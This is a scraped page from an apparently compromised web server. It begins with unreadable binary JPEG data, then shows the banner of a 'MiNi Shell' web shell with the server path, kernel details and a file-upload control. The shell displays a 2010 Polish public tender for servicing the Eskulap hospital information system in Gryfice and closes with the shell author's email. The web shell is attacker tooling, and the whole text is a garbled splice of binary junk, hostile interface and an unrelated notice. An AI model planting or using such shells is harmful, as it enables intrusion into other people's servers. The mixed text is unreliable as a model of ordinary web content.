JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/19160-N-2010.html

<p class="kh_header"><b>Gryfice: Serwis systemu informatycznego (HIS) Eskulap w SPZZOZ Gryfice</b><br>
<b>Numer ogłoszenia: 19160 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Niechorska 27, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842127, faks 091 3842127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.medicam.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwis systemu informatycznego (HIS) Eskulap w SPZZOZ Gryfice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Serwis Systemu Informatycznego /HIS/ Eskulap w SPZZOZ Gryfice 
1.	Obligatoryjny Serwis Aplikacji 
Przedmiot usługi
Gotowość WYKONAWCY do usuwania Błędów Oprogramowania Aplikacyjnego.
Procedura realizacji ZAMAWIAJĄCY
Uprawnieni pracownicy ZAMAWIAJĄCEGO dokonują zgłoszenia Błędu Aplikacji poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej z opisem błędu, lub telefonicznie. W celu umożliwienia Serwisowi zapoznania się z meritum problemu zgłoszenie powinno zawierać informacje uzupełniające oraz przykłady /np. zrzuty z ekranu/.

Procedura realizacji SERWIS
1. Jeżeli informacje zawarte w zgłoszeniu nie pozwalają na udzielenie jednoznacznej odpowiedzi, Serwis kontaktuje się z ZAMAWIAJĄCYM w celu dokonania analizy przedmiotu zgłoszenia lub uzupełnienia zawartych w nim  informacji. 
2. Jeżeli w wyniku działań serwisu przedstawiciel ZAMAWIAJĄCEGO zobligowany jest do pisemnego uzupełnienia zgłoszenia to następuje zawieszenie terminu realizacji zgłoszenia, do czasu uzupełnienia zgłoszenia.
3. Serwis nie później, niż w czasie obsługi zgłoszenia podejmuje jedno z następujących działań:
- przekazuje ZAMAWIAJĄCEGO procedurę usunięcia Błędu Aplikacji we własnym zakresie,
- zdalnie usuwa Błąd Aplikacji, 
- usuwa błąd Aplikacji w siedzibie ZAMAWIAJĄCEGO. 
4. Jeżeli Błąd Aplikacji jest Usterką Programistyczną, Serwis nie później, niż  w czasie obsługi zgłoszenia przekazuje Autorowi w celu opracowania Update usuwającego zidentyfikowaną usterkę. Po otrzymaniu od Autora Update Serwis niezwłocznie lecz nie później, niż w czasie usunięcia Usterki Programistycznej dostarcza Update ZAMAWIAJĄCEMU oraz informuje o tym fakcie poprzez wysłanie powiadomienia na wskazany w Umowie adres poczty elektronicznej.  
2.	Konsultacje
Przedmiot usługi
Gotowość WYKONAWCY do świadczenia ZAMAWIAJĄCEMU konsultacji  w zakresie Aplikacji Eskulap.
Procedura realizacji ZAMAWIAJĄCY
Uprawnieni pracownicy ZAMAWIAJĄCEGO  dokonują zgłoszenia zapotrzebowania na konsultację poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej z opisem błędu, lub telefonicznie.  W celu umożliwienia Serwisowi zapoznania się z meritum problemu zgłoszenie powinno zawierać informacje uzupełniające oraz przykłady /np. zrzuty z ekranu/.
Procedura realizacji SERWIS
1. Jeżeli informacje zawarte w zgłoszeniu nie pozwalają na udzielenie jednoznacznej odpowiedzi, Serwis kontaktuje się z ZAMAWIAJĄCYM w celu dokonania analizy przedmiotu zgłoszenia  lub uzupełnienia zawartych w nim  informacji.  
2. Jeżeli w wyniku działań serwisu przedstawiciel ZAMAWIAJĄCEGO zobligowany jest do pisemnego uzupełnienia zgłoszenia to następuje zawieszenie terminu realizacji zgłoszenia, do czasu uzupełnienia zgłoszenia.
3. Jeżeli zgłoszenie jest kompletne konsultant udziela konsultacji drogą elektroniczną lub   w przypadkach, w których przedmiot zgłoszenia tego wymaga, drogą telefoniczną.

3.	Zarządzanie umowami z NFZ
Przedmiot usługi
Gotowość WYKONAWCY do zaczytywania do systemu Eskulap umów i aneksów zawieranych pomiędzy ZAMAWIAJĄCYM a NFZ oraz  ich  poprawnej konfiguracji

Procedura realizacji ZAMAWIAJĄCY
Uprawnieni pracownicy ZAMAWIAJĄCEGO dokonują zgłoszenia terminu zaczytania do systemu Eskulap umowy z NFZ lub aneksu do umowy poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej.
Zgłoszenie powinno zawierać również plik do zaczytania lub miejsce, skąd plik może zostać pobrany.
ZAMAWIAJĄCY zobowiązany jest do:
-wyłączności na zaczytywanie i konfigurację umów dla WYKONAWCY,
-zapewnienia stabilnego i wydajnego łącza, umożliwiającego realizację zdalnie aktualizacji,
-zapewnienia na czas zaczytywania i konfiguracji umów obecności administratora w siedzibie ZAMAWIAJĄCEGO.
-zaniechania eksploatacji Aplikacji Eskulap - Rozliczenia w trakcie jej aktualizacji.
Procedura realizacji SERWIS
1. W dniu realizacji aktualizacji pracownik Serwisu kontaktuje się z uprawnionym pracownikiem ZAMAWIAJĄCEGO w celu potwierdzenia realizacji.
2. W wyznaczonej godzinie pracownik Serwisu dokonuje zaczytania i konfiguracji umowy, zakończenie prac potwierdza mailowo pracownikowi ZAMAWIAJĄCEGO.


4.	Aktualizacja Aplikacji
Przedmiot usługi
Gotowość WYKONAWCY do aktualizacji Aplikacji na serwerze ZAMAWIAJĄCEGO w godzinach pracy Serwisu.

Procedura realizacji ZAMAWIAJĄCY
ZAMAWIAJĄCY zobowiązany jest do zapewnienia:
-stabilnego i wydajnego łącza, umożliwiającego realizację zdalnie aktualizacji,
-zapewnienia na czas aktualizacji obecności administratora w siedzibie ZAMAWIAJĄCEGO

Procedura realizacji SERWIS
1. W dniu realizacji aktualizacji pracownik Serwisu kontaktuje się z uprawnionym pracownikiem ZAMAWIAJĄCEGO w celu potwierdzenia realizacji.
2. W wyznaczonej godzinie pracownik Serwisu dokonuje wykonanie kopii bazy danych przed aktualizacją, a następnie wskazanych aktualizacji zdalnie na serwerze ZAMAWIAJĄCEGO, zakończenie prac potwierdza mailowo pracownikowi ZAMAWIAJĄCEGO. W trakcie aktualizacji Aplikacji na serwerze pracownicy ZAMAWIAJĄCEGO zobligowani są do zapewnienia aktualizacji                    na stacjach roboczych ZAMAWIAJĄCEGO.
5.	 Serwis motoru Bazy Danych
Przedmiot usługi
Gotowość WYKONAWCY do usuwania awarii Motoru Bazy Danych.

Procedura realizacji ZAMAWIAJĄCY
zgłoszenia Awarii poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej z opisem błędu, lub telefonicznie. W celu umożliwienia Serwisowi zapoznania się z meritum problemu zgłoszenie powinno zawierać informacje uzupełniające oraz przykłady /np. zrzuty z ekranu/.
ZAMAWIAJĄCY zobowiązany jest do zapewnienia:
-stabilnego i wydajnego łącza, umożliwiającego realizację zdalnie aktualizacji,
-zapewnienia na czas naprawy obecności administratora w siedzibie ZAMAWIAJĄCEGO.
Procedura realizacji SERWIS
1. Jeżeli informacje zawarte w zgłoszeniu nie pozwalają na udzielenie jednoznacznej odpowiedzi, Serwis kontaktuje się z ZAMAWIAJĄCYM w celu dokonania analizy przedmiotu zgłoszenia lub uzupełnienia zawartych w nim  informacji.  
2. Jeżeli w wyniku działań serwisu przedstawiciel ZAMAWIAJĄCEGO zobligowany jest do pisemnego uzupełnienia zgłoszenia to następuje zawieszenie terminu realizacji zgłoszenia, do czasu uzupełnienia zgłoszenia.
3. Serwis nie później, niż w czasie obsługi zgłoszenia, wszczyna działania mające na celu usunięcie awarii i w zależności od potrzeb realizuje następujące czynności:
-zatrzymywanie i uruchamianie bazy danych, 
-zatrzymywanie i uruchamianie listener-a, 
-odblokowywanie kont użytkowników,
-kompilacja obiektów bazy danych,
-przeliczanie statystyk bazy danych, 
-dodawania i modyfikacja przestrzeni tabel.
Czas obsługi zgłoszenia:
-Czas reakcji 8 godzin, Czas liczony od momentu zgłoszenia przez ZAMAWIAJĄCEGO do momentu podjęcia działań przez SERWIS. Obowiązuje w godzinach pracy Serwisu. W przypadku dokonania zgłoszenia o Awarii na 3h przed końcem pracy serwisu, realizacja zgłoszenia nastąpi w dniu następnym.
-Czas usunięcia awarii. Od momentu podjęcia działań przez SERWIS do usunięcia awarii. W przypadku /kiedy praca z aplikacją nie jest możliwa z powodu uszkodzenia/ - Nie dłużej niż 24h od daty i godziny podjęcia działań przez SERWIS.
-Czas usunięcia usterki. Od momentu podjęcia działań przez SERWIS do usunięcia usterki. W przypadku wadliwego działania, ale nie zaburzającego znacząco dla ZAMAWIAJĄCEGO pracy z aplikacją - Nie dłużej niż 72h od daty i godziny podjęcia działań przez SERWIS..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Spełniają wymogi określone w art. 22 ust.1 ustawy Prawo zamówień publicznych  /załącznik nr 1/, tj.:
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy  nakładają obowiązek posiadania takich uprawnień,
b)	posiadania  wiedzy i doświadczenia, 
c)	dysponowania odpowiednim potencjałem technicznym oraz  osobami zdolnymi                     do wykonywania zamówienia;  
d)	sytuacji ekonomicznej i finansowej. 
2)	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2,  ustawy Prawo zamówień  publicznych o udzielenie zamówienia.
3)	Złożą ofertę spełniającą warunki określone w niniejszej SIWZ.

Ocena  spełnienia  warunków  udziału  w postępowaniu  odbywać  się  będzie  na podstawie dokumentów i oświadczeń przedłożonych przez wykonawcę wraz z ofertą, zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypis z rejestru handlowego lub zaświadczenie o prowadzeniu działalności gospodarczej  /wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert/.
2.	 Wykaz wykonanych w okresie ostatnich trzech lat  przed wszczęciem postępowania,  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie 1 usługi   stanowiącej  przedmiot zamówienia, z podaniem przedmiotu zamówienia,  daty wykonania, odbiorcy oraz załączenia dokumentów potwierdzających, że usługa ta była wykonana należycie  /załącznik Nr 2/.
3.	Dokument potwierdzający możliwość świadczenia usług w zakresie będącym przedmiotem zamówienia, a w szczególności oświadczenie Autora Oprogramowania, iż Wykonawca jest upoważniony do świadczenia usług będących przedmiotem zamówienia.
4.	Oświadczenie Wykonawcy, iż posiada odpowiednie kwalifikacje do świadczenia usług będących przedmiotem zamówienia. a w szczególności, iż zatrudnia pracowników, którzy posiadają udokumentowane umiejętności administrowania systemem zarządzania bazą danych Oracle 10.
5.	Certyfikaty/świadectwa wystawione przez producenta SZBD Oracle, dla pracowników zatrudnionych przez Wykonawcę, o umiejętności administrowania systemem zarządzania bazą danych Oracle 10;
6.	Oświadczenie Wykonawcy, że aktualizacje oprogramowania będą zgodne  z obowiązującymi przepisami i aktami normatywnymi, zarówno co do strony merytorycznej jak i technicznej,  a w szczególności będą spełniać minimalne wymagania dla systemów teleinformatycznych, przy pomocy których Zamawiający realizuje zadania publiczne /Rozporządzenie Rady Ministrów z dnia 11 października 2005r. w sprawie minimalnych wymagań dla systemów teleinformatycznych Dz. U. 2005 nr 212 poz. 1766/;
 
 Określone wyżej dokumenty powinny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę - osobę upoważnioną do podpisania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.medicam.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 
ul. Niechorska 27, 
72-300 Gryfice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 
ul. Niechorska 27, 
72-300 Gryfice 
SEKRETARIAT- II piętro, pok. 203.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com